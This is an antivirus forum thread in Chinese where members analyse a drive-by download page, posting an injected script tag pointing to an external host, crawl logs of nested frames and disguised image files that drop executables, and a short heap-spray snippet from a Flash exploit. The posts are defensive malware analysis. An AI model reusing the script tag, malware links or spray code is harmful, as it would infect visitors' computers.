12   1  /  2  页   跳转

[教程] 请工程师分析

请工程师分析

该用户帖子内容已被屏蔽
分享到:
gototop
 

回复:请工程师分析

如果该网站异常,建议楼主举报恶意网站

http://tool.ikaka.com/report.asp
gototop
 

回复:请工程师分析

<script language=javascript src=http://hlq.xorg.pl/c.js?google_ad=02x171_ad></script>
转义符清除(\x,\,%)(参数/无参数)

刚才没弄明白什么意思,不好意思~~
下面是我的版本:
Log is generated by FreShow.
[wide]http://act.bij.pl/22/899sd.htm
    [frame]http://act.bij.pl/22/av.htm
        [frame]http://act.bij.pl/22/mp.htm
            [script]http://act.bij.pl/22/ll0.jpg
            [script]http://act.bij.pl/22/ll1.jpg
            [script]http://act.bij.pl/22/upp.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/llll1.jpg
            [script]http://act.bij.pl/22/llll.jpg
            [script]http://act.bij.pl/22/lllll.jpg
        [frame]http://act.bij.pl/22/nod.htm
            [frame]http://act.bij.pl/22/lz.htm
                [script]http://act.bij.pl/22/oopk.jpg
                    [object]http://act.bij.pl/l/hh.exe
                [script]http://act.bij.pl/22/ll1.jpg
                [script]http://act.bij.pl/22/lz.jpg
        [frame]http://act.bij.pl/22/real.htm
            [frame]http://act.bij.pl/22/myra.htm
                [script]http://act.bij.pl/22/myr.jpg
                    [object]http://act.bij.pl/l/hh.exe
        [frame]http://act.bij.pl/22/rising.htm
            [frame]http://act.bij.pl/22/ofnt.htm
                [script]http://act.bij.pl/22/oopk.jpg
                    [object]http://act.bij.pl/l/hh.exe
                [script]http://act.bij.pl/22/uug.jpg
    [script]http://act.bij.pl/22/\"fa.js\"
    [script]http://act.bij.pl/22/\"1.js\"
    [script]http://js.tongji.linezing.com/806392/tongji.js
最后编辑DragonKid 最后编辑于 2010-02-17 17:30:14
gototop
 

回复:请工程师分析

Log is generated by FreShow.
[wide]http://act.bij.pl/22/899sd.htm
    [frame]http://act.bij.pl/22/av.htm
        [frame]http://act.bij.pl/22/mp.htm
        [frame]http://act.bij.pl/22/nod.htm
        [frame]http://act.bij.pl/22/real.htm
            [frame]http://act.bij.pl/22/myra.htm
                [script]http://act.bij.pl/22/myr.jpg
        [frame]http://act.bij.pl/22/rising.htm
            [frame]http://act.bij.pl/22/ofnt.htm
                [object]http://act.bij.pl/l/hh.exe
                [script]http://act.bij.pl/22/oopk.jpg
                [script]http://act.bij.pl/22/uug.jpg
    [script]http://act.bij.pl/22/\"fa.js\"
    [script]http://act.bij.pl/22/\"1.js\"
目前知道这里,继续
最后编辑leo108 最后编辑于 2010-02-17 16:40:12
gototop
 

回复: 请工程师分析

其他不用了
都是
                [object]http://act.bij.pl/l/hh.exe
这挂马的人真NB,什么加密方法都用上了,建议所有反毒学员都去看看
gototop
 

回复:请工程师分析

Log is generated by FreShow.
[wide]http://act.bij.pl/22/av.htm
    [frame]http://act.bij.pl/22/mp.htm
        [script]http://act.bij.pl/22/ll0.jpg
        [script]http://act.bij.pl/22/ll1.jpg
        [script]http://act.bij.pl/22/upp.jpg
            [object]http://act.bij.pl/l/hh.exe
        [script]http://act.bij.pl/22/llll1.jpg
        [script]http://act.bij.pl/22/llll.jpg
        [script]http://act.bij.pl/22/lllll.jpg
    [frame]http://act.bij.pl/22/nod.htm
        [frame]http://act.bij.pl/22/lz.htm
            [script]http://act.bij.pl/22/oopk.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/ll1.jpg
            [script]http://act.bij.pl/22/lz.jpg
    [frame]http://act.bij.pl/22/real.htm
        [frame]http://act.bij.pl/22/myra.htm
            [object]http://act.bij.pl/l/hh.exe
    [frame]http://act.bij.pl/22/rising.htm
        [frame]http://act.bij.pl/22/ofnt.htm
            [script]http://act.bij.pl/22/oopk.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/uug.jpg
完整版~~累啊~
大部分是shellcode带BD密钥的,有一个是利用real的漏洞。alpha2也能解决~  但是http://act.bij.pl/22/myra.htm这个在Freshow里面获取代码不全,有了很大的迷惑性
最后编辑暗夜的雪 最后编辑于 2010-02-17 16:53:38
娱乐致死还是娱乐至死啊?
gototop
 

回复:请工程师分析

Log is generated by FreShow.
[wide]http://act.bij.pl/22/av.htm
    [frame]http://act.bij.pl/22/mp.htm
        [script]http://act.bij.pl/22/ll0.jpg
        [script]http://act.bij.pl/22/ll1.jpg
        [script]http://act.bij.pl/22/upp.jpg
            [object]http://act.bij.pl/l/hh.exe
        [script]http://act.bij.pl/22/llll1.jpg
        [script]http://act.bij.pl/22/llll.jpg
        [script]http://act.bij.pl/22/lllll.jpg
    [frame]http://act.bij.pl/22/nod.htm
        [frame]http://act.bij.pl/22/lz.htm
            [script]http://act.bij.pl/22/oopk.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/ll1.jpg
            [script]http://act.bij.pl/22/lz.jpg
    [frame]http://act.bij.pl/22/real.htm
        [frame]http://act.bij.pl/22/myra.htm
            [script]http://act.bij.pl/22/myr.jpg
                [object]http://act.bij.pl/l/hh.exe
    [frame]http://act.bij.pl/22/rising.htm
        [frame]http://act.bij.pl/22/ofnt.htm
            [script]http://act.bij.pl/22/oopk.jpg
                [object]http://act.bij.pl/l/hh.exe
            [script]http://act.bij.pl/22/uug.jpg
要深入,要专一.......
gototop
 

回复:请工程师分析

妈呀!! 还有呢,还没有解完呢,那个只不过是一个链接
要深入,要专一.......
gototop
 

回复:请工程师分析

Log is generated by FreShow.
[wide]http://act.bij.pl/22/899sd.htm
    [frame]http://act.bij.pl/22/av.htm
    [script]http://act.bij.pl/22/\"fa.js\"
        [frame]http://act.bij.pl/22/fla.htm
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
                [script]http://act.bij.pl/22/if.swf
            [frame]http://act.bij.pl/22/ +
                [script]http://act.bij.pl/22/if.swf
                [object]http://act.bij.pl/l/hhh.exe
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
            [frame]http://act.bij.pl/22/ +
                [object]http://act.bij.pl/l/hhh.exe
    [script]http://act.bij.pl/22/\"1.js\"
    [script]http://js.tongji.linezing.com/806392/tongji.js
要深入,要专一.......
gototop
 

回复: 请工程师分析

http://act.bij.pl/22/if.swf这个好象是个flash加密
我下载了,但是我不会解密,把后缀名给成txt代码看了看,不明白代码如下:

function ifmy()
{
var dd = arr.toString().replace(/,/g,"");
dd = dd.replace(/@/g,",")
eval(dd);
for(aniti=ina;aniti<0x600;aniti++)
{memory[aniti]=nop + SC;}}

附件附件:

文件名:if.rar
下载次数:294
文件类型:application/octet-stream
文件大小:
上传时间:2010-2-17 18:06:35
描述:rar

要深入,要专一.......
gototop
 
12   1  /  2  页   跳转
页面顶部
Powered by Discuz!NT